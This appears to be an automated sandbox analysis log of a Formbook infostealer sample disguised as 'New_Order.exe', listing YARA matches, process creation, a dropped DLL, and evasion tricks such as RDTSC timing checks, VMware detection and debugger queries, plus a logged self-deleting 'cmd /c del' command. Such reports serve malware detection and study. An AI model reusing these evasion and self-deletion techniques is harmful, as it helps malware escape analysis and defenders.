          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@13/8
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_01
          Source: C:\Users\user\Desktop\New_Order.exeFile created: C:\Users\user\AppData\Local\Temp\nsmC33E.tmpJump to behavior
          Source: New_Order.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\New_Order.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\New_Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: New_Order.exeVirustotal: Detection: 38%
          Source: New_Order.exeReversingLabs: Detection: 59%
          Source: C:\Users\user\Desktop\New_Order.exeFile read: C:\Users\user\Desktop\New_Order.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\New_Order.exe 'C:\Users\user\Desktop\New_Order.exe'
          Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\svchost.exe 'C:\Users\user\Desktop\New_Order.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\svchost.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\svchost.exe 'C:\Users\user\Desktop\New_Order.exe'
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\svchost.exe'
          Source: C:\Users\user\Desktop\New_Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: New_Order.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscript.pdbGCTL source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, 00000001.00000003.237522923.0000000003700000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, wscript.exe
          Source: Binary string: wscript.pdb source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
          Source: Binary string: svchost.pdb source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
          Source: Binary string: svchost.pdbUGP source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00410109 push eax; iretd
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A2F2 push es; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415BFC push ss; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041B46C push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041B402 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041B40B push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004154D4 push ss; iretd
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413E26 pushfd ; iretd
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414EC1 push es; retf
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_048BD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_00620109 push eax; iretd
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0062A2F2 push es; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_00625BFC push ss; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0062B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0062B46C push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0062B402 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0062B40B push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_006254D4 push ss; iretd
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_00623E26 pushfd ; iretd
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_00624EC1 push es; retf
          Source: C:\Users\user\Desktop\New_Order.exeFile created: C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dllJump to dropped file
          Source: C:\Users\user\Desktop\New_Order.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 00000000006185E4 second address: 00000000006185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exeRDTSC instruction interceptor: First address: 000000000061897E second address: 0000000000618984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\New_Order.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Windows\explorer.exe TID: 5048Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\wscript.exe TID: 6240Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: explorer.exe, 00000002.00000000.258112198.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.244873438.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000002.501665466.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000002.496335851.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000002.00000000.258172711.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000002.507902104.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.258172711.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wscript.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_10001000 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_024D1790 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_024D19A8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03931B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03931B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03953B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03953B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03925210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03925210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03925210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03925210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03943A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03929240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03929240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03929240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03929240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03929100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03929100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03929100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03944120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03944120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03944120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03944120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03944120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03929080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039637F5 mov eax, dword ptr fs:[00000030h]
